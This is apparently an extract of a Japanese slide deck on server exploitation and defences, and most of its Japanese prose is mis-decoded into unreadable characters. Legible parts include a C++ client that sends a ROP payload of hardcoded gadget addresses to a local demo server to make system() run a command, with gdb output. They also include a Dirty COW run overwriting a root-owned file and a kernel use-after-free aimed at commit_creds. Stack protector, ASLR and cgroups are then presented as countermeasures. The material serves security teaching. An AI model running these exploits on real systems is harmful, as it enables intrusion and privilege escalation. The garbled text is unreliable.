37. ߈ܸऀ͸αʔόͷίϯτϩʔϧΛखʹೖΕ͍ͨ ͦͷͨΊʹ͸shellΛىಈ͍ͨ͠ खͬऔΓૣ͘shellΛ্ཱͪ͛Δʹ͸ system("࣮ߦ͍ͨ͠ίϚϯυ"); Λݺ΂Ε͹ྑ͍ ೚ҙͷؔ਺Λݺ΂Δ͚ͩͰͳ͘
    ೚ҙͷจࣈྻΛҾ਺ͱͯ͠౉ͤΔඞཁ͕͋Δ

38. [1] System V Application Binary Interface AMD64 Architecture Processor Supplement

    §3.5.7 Variable Argument Lists x86_64 LinuxͰ͸ؔ਺ͷୈҰҾ਺͸ %rdiϨδελͰ౉͢͜ͱʹͳ͍ͬͯΔ[1] ࣮ߦ͍ͨ͠ίϚϯυΛϝϞϦʹॻ্͍ͨͰ
    Կͱ͔ͯͦ͠ͷΞυϨεΛ%rdiʹ৐ͤͯ
    retqͰؔ਺Λݺͼग़͢ඞཁ͕͋Δ rax rbp r8 r12 rbx rsp r9 r13 rcx rsi r10 r14 rdx rdi r11 r15

39. (gdb) disas _ZNSi6ignoreEl … 0x00007ffff788dfc5 <+309>: pop %r14 0x00007ffff788dfc7 <+311>:

    retq 0x7ffff788dfc5 ඪ४ϥΠϒϥϦ౳͔Βpopͯ͠retq͍ͯ͠ΔॴΛ୳ͯ͘͠Δ %r14ʹஔ͖͍ͨ஋ ͦͷޙʹ࣮ߦ͍ͨ͠ΞυϨε ελοΫʹࠨͷΑ͏ʹॻ͍ͯretq͢Δͱ
    %r14ʹ೚ҙͷ஋Λஔ͘͜ͱ͕Ͱ͖Δ Return Oriented Programming ૢ࡞͍ͨ͠ϨδελΛpopͯ͠retq͍ͯ͠ΔॴΛݟ͚ͭΕ͹
    ೚ҙͷҾ਺Λ͚ͭͯ೚ҙͷؔ਺Λݺͼग़͢͜ͱ͕Ͱ͖Δ

40. #include <iostream> #include <boost/asio.hpp> int main() { namespace asio =

    boost::asio; using boost::asio::ip::tcp; asio::io_service io_service; tcp::socket socket(io_service); socket.connect( tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 ) ); const std::vector< uint8_t > command{ 't', 'o', 'u', 'c', 'h', ' ', 'a', 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, }; std::vector< uint8_t > data { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00, 0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00, ࡉ޻ͨ͠σʔλΛૹΔΫϥΠΞϯτ ద౰ͳϑΝΠϧΛ࡞੒

41. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00, 0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00, 0xc0, 0xe5, 0x00, 0xf7, 0xff, 0x7f, 0x00, 0x00, 0x90, 0x3b, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00 }; for( size_t i = 0u; i != 10u; ++i ) std::copy( command.begin(), command.end(), std::back_inserter( data ) ); data.push_back( 0x0d ); data.push_back( 0x0a ); boost::system::error_code error; asio::write(socket, asio::buffer(data), error); return 0; if( !error ) { asio::streambuf receive_buffer; asio::read_until(socket, receive_buffer, '\n', error); std::cout << asio::buffer_cast<const char*>(receive_buffer.data()) << std::endl; } } ࡉ޻ͨ͠σʔλΛૹΔΫϥΠΞϯτ

42. tcp::socket socket(io_service); socket.connect( tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 ) ); const std::vector<

    uint8_t > command{ 't', 'o', 'u', 'c', 'h', ' ', 'a', 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, }; std::vector< uint8_t > data { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00, 0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00, 0xc0, 0xe5, 0x00, 0xf7, 0xff, 0x7f, 0x00, 0x00, 0x90, 0x3b, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00 }; for( size_t i = 0u; i != 10u; ++i ) std::copy( command.begin(), command.end(), std::back_inserter( data ) ); data.push_back( 0x0d ); ࡉ޻ͨ͠σʔλΛૹΔΫϥΠΞϯτ QPQ
    SEJͯ͠SFURͯ͠Δίʔυʹ
    ඈͿͨΊͷΞυϨε SEJʹ৐ͤΔ஋
    ࣮ߦ͍ͨ͠ίϚϯυ system() sync() exit() γΣϧεΫϦϓτ

43. $ ./pktgen ΫϥΠΞϯτ αʔό $ gdb -q ./tiny_server Reading symbols

    from ./tiny_server...done. (gdb) run Starting program: /home/fadis/tiny_server [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib64/ libthread_db.so.1". [Inferior 1 (process 11310) exited with code 02] (gdb) quit $ ls a tiny_server ͳΜ͔Ͱ͖ͯΔ

44. ߈ܸऀ͕αʔό্Ͱ
    ೚ҙͷૢ࡞Λग़དྷͯ͠·ͬͨ

45. ߈ܸऀ͕࣮ߦͨ͠shell͸ ߈ܸΛड͚ͨϓϩηεΛ࣮ߦͨ͠ϢʔβͷݖݶͰಈ͘ ߈ܸΛड͚ͨϓϩηε͕
    rootͰಈ͍͍ͯͳ͔ͬͨ৔߹
    ߈ܸऀ͸αʔόͷ׬શͳঠѲͷͨΊʹ
    ݖݶঢ֨Λߦ͏ඞཁ͕͋Δ Permission Denied

46. ݖݶঢ֨ʹ༻͍ΒΕΔ੬ऑੑͷྫ https://dirtycow.ninja/ ͜͜ʹ
    %*35:
    $08ͷτοϓϖʔδΛషΔ

47. DIRTY COW(CVE-2016-5195) mmap࣌ʹMAP_PRIVATEΛ͚ͭΔͱ
    ϑΝΠϧʹର͢Δॻ͖ࠐΈΛ
    ΦϦδφϧͷϑΝΠϧʹ
    ॻ͔ͳ͍Α͏ʹ͢Δ͜ͱ͕Ͱ͖Δ ॻ͖ࠐΈ ಡΈग़͠ ϓϩηε͔Β
    ݟͨϑΝΠϧ

    ΦϦδφϧͷ
    ϑΝΠϧ ΞυϨεۭؒ

48. DIRTY COW(CVE-2016-5195) ʮ࢑͘࢖Θͳ͍͔Βॻ͖ࠐΈͷ४උΛϝϞϦ͔ΒԼ͛ͯྑ͍ʯ
    ࢦఆΛߦ͏ͷͱಉ࣌ʹॻ͖ࠐΈΛߦ͏ͱ
    ΦϦδφϧͷϑΝΠϧʹॻ͍ͯ͠·͏ෆ۩߹ ΦϦδφϧͷϑΝΠϧʹ
    ॻ͖ʹ͍ͬͯ͠·͏ ϓϩηε͔Β
    ݟͨϑΝΠϧ ΦϦδφϧͷ
    

    ϑΝΠϧ MADV_DONTNEEDͰ
    ϝϞϦ͔ΒԼ͛Δ

49. DIRTY COW(CVE-2016-5195) https://github.com/kcgthb/RHEL6.x-COW/blob/master/6.7/noc0w.patch ͜ͷෆ۩߹ࣗମ͸ෳࡶͳ΋ͷͰ͸ͳ͘मਖ਼ύον͸ߦఔ ͜͜ʹ
    %*35:
    $08ͷमਖ਼ύονΛషΔ

50. DIRTY COW(CVE-2016-5195) root # echo 'abcde' >sample.txt root # ls

    -lha sample.txt -rw-r--r-- 1 root root 6 Mar 18 11:21 sample.txt root # logout non_root $ cat sample.txt abcde non_root $ ./dirtyc0w sample.txt ‘pwned' mmap 7f214599a000 ^C non_root $ cat sample.txt pwned non_root $ ls -lha sample.txt -rw-r--r-- 1 root root 6 3݄ 18 11:21 sample.txt ҰൠϢʔβ͕
    root͔͠ॻ͚ͳ͍ϑΝΠϧΛ
    ॻ͖׵͑ͯ͠·ͬͨ ͜Ε͕ՄೳͳΒrootϩάΠϯͷೝূΛແ͘͢͜ͱͩͬͯग़དྷΔ

51. CVE-2017-15265 ALSA Sequencer[1]ͷϙʔτΛ࡞͙ͬͯ͢ʹഁغ͢Δ [1] ALSA Sequencer http://www.alsa-project.org/~frank/alsa-sequencer/index.html Ϣʔβۭؒ Χʔωϧۭؒ ϙʔτ͍ͩ͘͞

    Ͳ͏ͧ ϙʔτͷͨΊͷ ྖҬͷ֬อ ϙʔτΛॳظԽ εϨου1 εϨου1 ϙʔτ΋͏͍͍΍ ϙʔτͷͨΊͷ ྖҬͷղ์ εϨου2 εϨου2 ͠Α͏ͱࢥͬͨΒ ແ͔ͬͨ

52. ͜͜ʹ
    -JOVYΧʔωϧͷ
    "-4"
    4FRVFODFSͷॳظԽதͰ
    ίʔϧόοΫΛಡΜͰ͍ΔՕॴΛషΔ Use After Free Χʔωϧͷߏ଄ମʹ͸ଟ਺ͷίʔϧόοΫؔ਺͕ઃఆ͞Ε͍ͯΔ ղ์ࡁΈͷϝϞϦ͸ಉαΠζͷϝϞϦΛ֬อ͢Δͱ
    ߴ֬཰Ͱಉ͡ྖҬΛऔಘͰ͖Δ

    ίʔϧόοΫΛ೚ҙͷΞυϨεʹॻ͖׵͑ͯΧʔωϧʹݺ͹ͤΔ https://elixir.bootlin.com/linux/v4.15.10/source/sound/core/seq/seq_clientmgr.c#L619 ϙʔτ͸΋͏ղ์͞ΕͯΔ͚Ͳ
    ͜͜Ͱϙʔτʹઃఆ͞Εͨ
    ίʔϧόοΫΛݺΜͰΔ

53. Use After Free ͜ΕΛར༻ͯ͠ԿΛݺ͹ͤΔ͔
    ͦΕ͸΋ͪΖΜ commit_creds( prepare_kernel_cred( NULL ) );

    ༁
    ԶΛrootʹ͠Ζ ղ์ࡁΈͷྖҬ͔ΒίʔϧόοΫΛݺͿঢ়ଶʹ͑͞Ͱ͖Ε͹
    ͜ͷ߈ܸ͕੒ཱ͢ΔՄೳੑ͕͋ΔͨΊ
    Use After FreeΛ࢖ͬͨݖݶঢ֨੬ऑੑ͸සൟʹݟ͔ͭΔ

54. Use After Free $7& $7& $7& ղ์ࡁΈͷྖҬ͔ΒίʔϧόοΫΛݺͿঢ়ଶʹ͑͞Ͱ͖Ε͹
    ͜ͷ߈ܸ͕੒ཱ͢ΔՄೳੑ͕͋ΔͨΊ
    Use After

    FreeΛ࢖ͬͨݖݶঢ֨੬ऑੑ͸සൟʹݟ͔ͭΔ $7& $7& $7& $7&

55. ߈ܸऀ͕αʔόΛ
    ׬શʹঠѲͯ͠͠·ͬͨ

56. ࠣࡉͳෆ۩߹͕
    ͠͹͠͹αʔόͷ
    ηΩϡϦςΟΛ୆ແ͠ʹ͢Δ

57. Ұ൪ྑ͍ͷ͸ෆ۩߹͕ແ͍ࣄ͕ͩ ͦ͏͸͍ͬͯ΋ෆ۩߹͸ग़ͯ͘ΔͷͰ ෆ۩߹͸ग़Δ΋ͷͱͯ͠ ग़དྷΔ͚ͩக໋తͳ߈ܸʹ௚݁ͤ͞ͳ͍ҝͷ ରॲΛߦ͏ඞཁ͕͋Δ

58. TUBDL
    QSPUFDUPS f: push %rbp mov %rsp,%rbp sub $0x20,%rsp mov %edi,-0x14(%rbp)

    mov %esi,-0x18(%rbp) mov %fs:0x28,%rax mov %rax,-0x8(%rbp) xor %eax,%eax mov -0x14(%rbp),%edx mov -0x18(%rbp),%eax add %edx,%eax mov -0x8(%rbp),%rcx xor %fs:0x28,%rcx je 40055f <f+0x39> callq 400400 <__stack_chk_fail@plt> leaveq retq f: push %rbp mov %rsp,%rbp mov %edi,-0x4(%rbp) mov %esi,-0x8(%rbp) mov -0x4(%rbp),%edx mov -0x8(%rbp),%eax add %edx,%eax pop %rbp retq ͋Δ࣌ ͳ͍࣌ gccͷ࠷దԽΦϓγϣϯͷ1ͭ ͳΜ͔
    ૿͑ͯΔ

59. TUBDL
    QSPUFDUPS f: push %rbp mov %rsp,%rbp sub $0x20,%rsp mov %edi,-0x14(%rbp)

    mov %esi,-0x18(%rbp) mov %fs:0x28,%rax mov %rax,-0x8(%rbp) xor %eax,%eax mov -0x14(%rbp),%edx mov -0x18(%rbp),%eax add %edx,%eax mov -0x8(%rbp),%rcx xor %fs:0x28,%rcx je 40055f <f+0x39> callq 400400 <__stack_chk_fail@plt> leaveq retq ͋ΔݻఆͷΞυϨε͔ΒಡΜͩ஋Λ
    ελοΫʹੵΉ ઌఔͱಉ͡ΞυϨε͔ΒಡΜͩ஋ͱ
    ελοΫͷ஋Λൺֱ͠
    Ұக͠ͳ͔ͬͨΒabort͢Δ

60. TUBDL
    QSPUFDUPS ؔ਺gͷม਺ ؔ਺gͷม਺ ؔ਺gͷม਺ ؔ਺f͕ऴΘͬͨΒ໭ΔҐஔ ؔ਺fͷม਺ ؔ਺fͷม਺ ؔ਺gͷSCQ ϥϯμϜͳ஋ όοϑΝΦʔόʔϥϯͰ
    

    returnΞυϨεΛॻ͖׵͑Δʹ͸
    ͜͜·Ͱॻ͖ࠐΉඞཁ͕͋Δ ؒʹڬ·͍ͬͯΔ
    ͜ͷ஋Λॻ͖׵͑ͯ͠·͏ͱ
    ϓϩάϥϜ͸ҟৗऴྃ͢Δ όοϑΝΦʔόʔϥϯΛར༻ͨ͠
    ೚ҙͷίʔυͷ࣮ߦ͕ͱͯ΋೉͘͠ͳΔ

61. TUBDL
    QSPUFDUPS xor %eax,%eax mov -0x14(%rbp),%edx mov -0x18(%rbp),%eax add %edx,%eax mov

    -0x8(%rbp),%rcx xor %fs:0x28,%rcx je 40055f <f+0x39> callq 400400 <__stack_chk_fail@plt> leaveq retq ઌఔͱಉ͡ΞυϨε͔ΒಡΜͩ஋ͱ
    ελοΫͷ஋Λൺֱ͠
    Ұக͠ͳ͔ͬͨΒabort͢Δ ελοΫ͕ഁյ͞ΕͨޙͳͷͰ
    ຊདྷͷॲཧʹ໭Δ͜ͱ͸Ͱ͖ͳ͍ stack-protector͸
    ߈ܸऀ͕೚ҙͷίʔυΛ࣮ߦͰ͖Δ੬ऑੑΛ
    ߈ܸऀ͕DoS߈ܸΛͰ͖Δ੬ऑੑʹऑΊΔ

62. ͜͜ʹ
    3FE)BUʹΑΔ#MVFCPSOFͷղઆΛషΔ https://access.redhat.com/security/vulnerabilities/blueborne ࣮ࡍʹTUBDL
    QSPUFDUPS͕໾ʹཱ͍ͬͯΔέʔε Blueborne(CVE-2017-1000251) γεςϜʹBluetoothͰ઀ଓͰ͖Δೝূ͞Ε͍ͯͳ͍Ϣʔβ͕
    γεςϜΛΫϥογϡͤ͞Δࣄ͕Ͱ͖Δ
    ͋Δ͍͸stack protector͕༗ޮʹͳ͍ͬͯͳ͍৔߹
    ೚ҙͷίʔυ͕࣮ߦ͞ΕΔՄೳੑ͕͋Δ

63. TUBDL
    QSPUFDUPS stack protector͸ελοΫΛগ͠༨෼ʹ࢖͍
    ϝϞϦΞΫηεͱൺֱ͕༨෼ʹൃੜ͢Δ -fno-stack-protector(σϑΥϧτ) -fstack-protector(͓͢͢Ί) -fstack-protector-all stack protectorΛ࢓ֻ͚ͳ͍ όΠτҎ্ͷจࣈྻΛѻ͏ؔ਺ʹstack

    protectorΛ࢓ֻ͚Δ ͋ΒΏΔؔ਺ʹstack protectorΛ࢓ֻ͚Δ ࢓ֻ͚͓ͯ͘ͱ໾ʹཱͭͱ͜Ζ͚ͩʹ࢓ֻ͚͓͖͍ͯͨ

64. TUBDL
    QSPUFDUPS stack protector͸ ελοΫ্ͰͷϝϞϦഁյΛݕ஌͢Δ όοϑΝΦʔόʔϥϯ͕ώʔϓ্ͳͲͷ ελοΫҎ֎ͷ৔ॴͰى͜Γ ͦΕʹΑͬͯഁյ͞ΕͨΞυϨεʹδϟϯϓ͕Մೳͳ৔߹ stack protector͸߈ܸΛ๷͙ࣄ͕Ͱ͖ͳ͍

65. address space layout randomization $ cat /proc/self/maps 00400000-00407000 r-xp 00000000

    08:03 35724749 /bin/cat … 00608000-00629000 rw-p 00000000 00:00 0 [heap] 7f9e54cd8000-7f9e5b63d000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive 7f9e5b63d000-7f9e5b7cc000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so … 7ffeb0a50000-7ffeb0a72000 rw-p 00000000 00:00 0 [stack] 7ffeb0b87000-7ffeb0b89000 r--p 00000000 00:00 0 [vvar] 7ffeb0b89000-7ffeb0b8b000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] $ cat /proc/self/maps 00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat … 00608000-00629000 rw-p 00000000 00:00 0 [heap] 7f5e24988000-7f5e2b2ed000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive 7f5e2b2ed000-7f5e2b47c000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so … 7fffe276e000-7fffe2790000 rw-p 00000000 00:00 0 [stack] 7fffe27c2000-7fffe27c4000 r--p 00000000 00:00 0 [vvar] 7fffe27c4000-7fffe27c6000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] ϓϩηεΛىಈ͢ΔͨͼʹϝϞϦϨΠΞ΢τΛม͑Δ 1ճ໨ 2ճ໨

66. address space layout randomization $ cat /proc/self/maps 00400000-00407000 r-xp 00000000

    08:03 35724749 /bin/cat … 00608000-00629000 rw-p 00000000 00:00 0 [heap] 7f9e54cd8000-7f9e5b63d000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive 7f9e5b63d000-7f9e5b7cc000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so … 7ffeb0a50000-7ffeb0a72000 rw-p 00000000 00:00 0 [stack] 7ffeb0b87000-7ffeb0b89000 r--p 00000000 00:00 0 [vvar] 7ffeb0b89000-7ffeb0b8b000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] $ cat /proc/self/maps 00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat … 00608000-00629000 rw-p 00000000 00:00 0 [heap] 7f5e24988000-7f5e2b2ed000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive 7f5e2b2ed000-7f5e2b47c000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so … 7fffe276e000-7fffe2790000 rw-p 00000000 00:00 0 [stack] 7fffe27c2000-7fffe27c4000 r--p 00000000 00:00 0 [vvar] 7fffe27c4000-7fffe27c6000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] ϓϩηεΛىಈ͢ΔͨͼʹϝϞϦϨΠΞ΢τΛม͑Δ 1ճ໨ 2ճ໨ ελοΫͷΞυϨε͕࣮ߦ͢ΔͨͼʹมԽ͍ͯ͠Δ 7ffeb0a50000-7ffeb0a72000 7fffe276e000-7fffe2790000 system()ʹ౉͢ҝʹॻ͖ࠐΜͩ
    γΣϧεΫϦϓτͷΞυϨε͕ຖճมΘΔҝ
    εΫϦϓτͷ࣮ߦ͕ͱͯ΋೉͘͠ͳΔ

67. address space layout randomization $ cat /proc/self/maps 00400000-00407000 r-xp 00000000

    08:03 35724749 /bin/cat … 00608000-00629000 rw-p 00000000 00:00 0 [heap] 7f9e54cd8000-7f9e5b63d000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive 7f9e5b63d000-7f9e5b7cc000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so … 7ffeb0a50000-7ffeb0a72000 rw-p 00000000 00:00 0 [stack] 7ffeb0b87000-7ffeb0b89000 r--p 00000000 00:00 0 [vvar] 7ffeb0b89000-7ffeb0b8b000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] $ cat /proc/self/maps 00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat … 00608000-00629000 rw-p 00000000 00:00 0 [heap] 7f5e24988000-7f5e2b2ed000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive 7f5e2b2ed000-7f5e2b47c000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so … 7fffe276e000-7fffe2790000 rw-p 00000000 00:00 0 [stack] 7fffe27c2000-7fffe27c4000 r--p 00000000 00:00 0 [vvar] 7fffe27c4000-7fffe27c6000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] ϓϩηεΛىಈ͢ΔͨͼʹϝϞϦϨΠΞ΢τΛม͑Δ 1ճ໨ 2ճ໨ ϥΠϒϥϦͷ഑ஔ΋࣮ߦ͢ΔͨͼʹมԽ 7f9e5b63d000-7f9e5b7cc000 7f5e2b2ed000-7f5e2b47c000 system()౳͕ஔ͔Ε͍ͯΔΞυϨε΋
    ϥϯμϜʹมԽ͢Δҝ
    ೚ҙͷίʔυͷ࣮ߦ͕ͱͯ΋೉͘͠ͳΔ

68. $ gdb -q ./tiny_server Reading symbols from ./tiny_server...done. (gdb) set

    disable-randomization off (gdb) run Starting program: /home/fadis/tiny_server_test/tiny_server [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib64/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7931f54 in ?? () (gdb) backtrace #0 0x00007ffff7931f54 in ?? () #1 0x00007fffffffd3a0 in ?? () #2 0x00007ffff6f6d350 in ?? () #3 0x00007ffff700e5c0 in ?? () #4 0x00007ffff6f63b90 in ?? () #5 0x0061206863756f74 in ?? () #6 0x0000000000000000 in ?? () (gdb) p &system $1 = (<text variable, no debug info> *) 0x7f51c76cd350 <system> (gdb) disas 0x7ffff7931f54 No function contains specified address. ઌఔγΣϧͷ࣮ߦʹ੒ޭͨ͠ྫΛASLR༗ΓͰߦͳͬͨ৔߹

69. $ gdb -q ./tiny_server Reading symbols from ./tiny_server...done. (gdb) set

    disable-randomization off (gdb) run Starting program: /home/fadis/tiny_server_test/tiny_server [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib64/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7931f54 in ?? () (gdb) backtrace #0 0x00007ffff7931f54 in ?? () #1 0x00007fffffffd3a0 in ?? () #2 0x00007ffff6f6d350 in ?? () #3 0x00007ffff700e5c0 in ?? () #4 0x00007ffff6f63b90 in ?? () #5 0x0061206863756f74 in ?? () #6 0x0000000000000000 in ?? () (gdb) p &system $1 = (<text variable, no debug info> *) 0x7f51c76cd350 <system> (gdb) disas 0x7ffff7931f54 No function contains specified address. ઌఔγΣϧͷ࣮ߦʹ੒ޭͨ͠ྫΛASLR༗ΓͰߦͳͬͨ৔߹ system()͕ظ଴ͨ͠ΞυϨεͱҟͳΔ৔ॴʹ഑ஔ͞Ε͍ͯΔ 0x00007ffff6f6d350 0x7f51c76cd350 ASLRແ͠ͷ৔߹ʹsystem()͕ஔ͍ͯ͋ͬͨ৔ॴ ࣮ࡍʹsystem()͕ ഑ஔ͞Ε͍ͯͨ৔ॴ

70. $ gdb -q ./tiny_server Reading symbols from ./tiny_server...done. (gdb) set

    disable-randomization off (gdb) run Starting program: /home/fadis/tiny_server_test/tiny_server [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib64/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7931f54 in ?? () (gdb) backtrace #0 0x00007ffff7931f54 in ?? () #1 0x00007fffffffd3a0 in ?? () #2 0x00007ffff6f6d350 in ?? () #3 0x00007ffff700e5c0 in ?? () #4 0x00007ffff6f63b90 in ?? () #5 0x0061206863756f74 in ?? () #6 0x0000000000000000 in ?? () (gdb) p &system $1 = (<text variable, no debug info> *) 0x7f51c76cd350 <system> (gdb) disas 0x7ffff7931f54 No function contains specified address. ઌఔγΣϧͷ࣮ߦʹ੒ޭͨ͠ྫΛASLR༗ΓͰߦͳͬͨ৔߹ ͦΕҎલʹ࠷ॳʹpop %rdi͢Δҝͷίʔυย͕ ظ଴ͨ͠৔ॴʹͳ͍ 0x00007ffff7931f54 No function contains specified address ASLRແ͠ͷ৔߹ʹpop %rdiͱretq͕͋ͬͨ৔ॴ ͦ͜ʹؔ਺͸ແ͍

71. $ gdb -q ./tiny_server Reading symbols from ./tiny_server...done. (gdb) set

    disable-randomization off (gdb) run Starting program: /home/fadis/tiny_server_test/tiny_server [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib64/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7931f54 in ?? () (gdb) backtrace #0 0x00007ffff7931f54 in ?? () #1 0x00007fffffffd3a0 in ?? () #2 0x00007ffff6f6d350 in ?? () #3 0x00007ffff700e5c0 in ?? () #4 0x00007ffff6f63b90 in ?? () #5 0x0061206863756f74 in ?? () #6 0x0000000000000000 in ?? () (gdb) p &system $1 = (<text variable, no debug info> *) 0x7f51c76cd350 <system> (gdb) disas 0x7ffff7931f54 No function contains specified address. ઌఔγΣϧͷ࣮ߦʹ੒ޭͨ͠ྫΛASLR༗ΓͰߦͳͬͨ৔߹ ͦͷ݁Ռ Կ΋ׂΓ౰ͯΒΕ͍ͯͳ͍ϝϞϦʹretqͰඈ΅͏ͱͯ͠ ൣғ֎ࢀরͰϓϩηε͕ఀࢭͨ͠ ߈ܸऀ͕೚ҙͷίʔυΛ࣮ߦͰ͖Δ੬ऑੑΛ
    ߈ܸऀ͕DoS߈ܸΛͰ͖Δ੬ऑੑʹऑΊΔࣄ͕Ͱ͖ͨ

72. LinuxͷίϯςφΛ׆༻ͤΑ

73. ਌ϓϩηεͱࢠϓϩηε ϓϩηεத͔ΒผͷϓϩηεΛ্ཱͪ͛Δͱ ͦͷϓϩηε͸ݩͷϓϩηεͷࢠʹͳΔ ϓϩηε /bin/ls execl("/bin/ls","/bin/ls",nullptr ); ىಈ ਌ϓϩηε ࢠϓϩηε

74. init!"!5*[agetty] #!busybox #!login!!!bash!!!top #!sshd!"!sshd!!!sshd!!!bash!!!pstree $ %!sshd!!!sshd!!!bash!!!vim %!udevd γεςϜىಈ࣌ʹ࣮ߦ͞ΕΔ initҎ֎ͷશͯͷϓϩηε͸ init͔ΒḷΕΔ਌ࢠؔ܎ͷͲ͔͜ʹͿΒԼ͕͍ͬͯΔ

    initͷࢠͷ
    sshd͔Βىಈ͞Εͨ
    bash͔Βىಈ͞Εͨ
    vim ਌ϓϩηεͱࢠϓϩηε

75. init!"!5*[agetty] #!busybox #!login!!!bash!!!top #!sshd!"!sshd!!!sshd!!!bash!!!pstree $ %!sshd!!!sshd!!!bash!!!vim %!udevd ࢦఆͨ͠ϓϩηεͱ͔ͦ͜Βੜ·Εͨࢠϓϩηεʹ γεςϜͷϦιʔεͷ࢖༻ʹؔ͢Δ੍ݶΛઃఆ͢Δ cgroups

    ྫ: ͜ͷൣғͷϓϩηε͸ 1൪໨ͷCPU͔͠ ࢖ͬͯ͸͍͚ͳ͍ (cpuset cgroup)

76. ϒϩοΫI/O cgroup ࢦఆͨ͠ϓϩηεάϧʔϓ͔Βͷ ϒϩοΫσόΠε΁ͷI/OΛ੍ݶ͢Δ ͜ͷάϧʔϓ಺ͷϓϩηε͸ ͲΜͳʹετϨʔδʹ༨ྗ͕͋ͬͯ΋ ࢦఆ͞ΕͨҎ্ͷI/OଳҬΛ࢖͑ͳ͍ ߹ܭ.CQT੍ݶ

77. ະ࢖༻ CPU cgroup ࢦఆͨ͠ϓϩηεάϧʔϓ͔Βͷ CPUͷ࢖༻཰Λ੍ݶ͢Δ ͜ͷάϧʔϓ಺ͷϓϩηε͸ ͲΜͳʹCPUʹ༨ྗ͕͋ͬͯ΋ ࢦఆ͞ΕͨҎ্ʹ CPUΛ࢖͏ࣄ͸Ͱ͖ͳ͍ ߹ܭ੍ݶ

78. cgroups ଞʹ΋ϝϞϦͷ࢖༻཰΍HugeTLBͷׂΓ౰ͯͷ੍ݶͳͲ͕ උΘ͍ͬͯΔ͕ ੬ऑੑ߈ܸʹର͢Δඋ͑ͱͯ͠஫໨͢΂͖ͳͷ͸ pids devices ͱ

